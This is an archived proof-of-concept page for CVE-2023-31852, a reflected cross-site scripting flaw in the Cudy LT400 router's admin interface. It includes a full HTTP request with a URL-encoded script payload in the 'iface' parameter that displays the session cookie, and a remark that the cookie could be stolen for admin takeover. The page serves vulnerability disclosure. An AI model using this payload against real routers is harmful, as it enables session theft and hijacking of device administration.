CVE-2023-31852 PoC — Cudy Technology LT400 跨站脚本漏洞

Source

https://github.com/CalfCrusher/CVE-2023-31852

Associated Vulnerability

Title:Cudy Technology LT400 跨站脚本漏洞 (CVE-2023-31852)
Description:Cudy Technology LT400是中国Cudy Technology公司的一款无线路由器。 Cudy Technology LT400 1.13.4版本存在安全漏洞，该漏洞源于在cgi-bin/luci/admin/network/wireless/config中的 iface 参数中存在安全问题。

Readme

# CVE-2023-31852

Reflected cross-site scripting (XSS) attack exists in web-based management interface of Cudy LT400.

The page `/cgi-bin/luci/admin/network/wireless/config` has reflected XSS via the `iface` parameter.

The methods of exploitation would involve sending a specially crafted request to the victim that includes malicious code.

**The affected application does not set the Session Cookie with the HttpOnly attribute; this can result in admin takeover via session token theft.**

## PoC

```
GET /cgi-bin/luci/admin/network/wireless/config?nomodal=&iface=wlan00%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e HTTP/1.1
Host: 172.16.1.1
User-Agent: Mozilla/5.0
Accept: text/html, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://172.16.1.1/cgi-bin/luci/admin/setup
Cookie: sysauth=REDACTED
```

## Vendor

Shenzhen Cudy Technology

## CVE Reference

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31852

## Product Reference

https://www.cudy.com

File Snapshot


 [4.0K]  /data/pocs/e92a7a31da203578905b4f840ad7f45b7f07a253
└── [1.1K]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!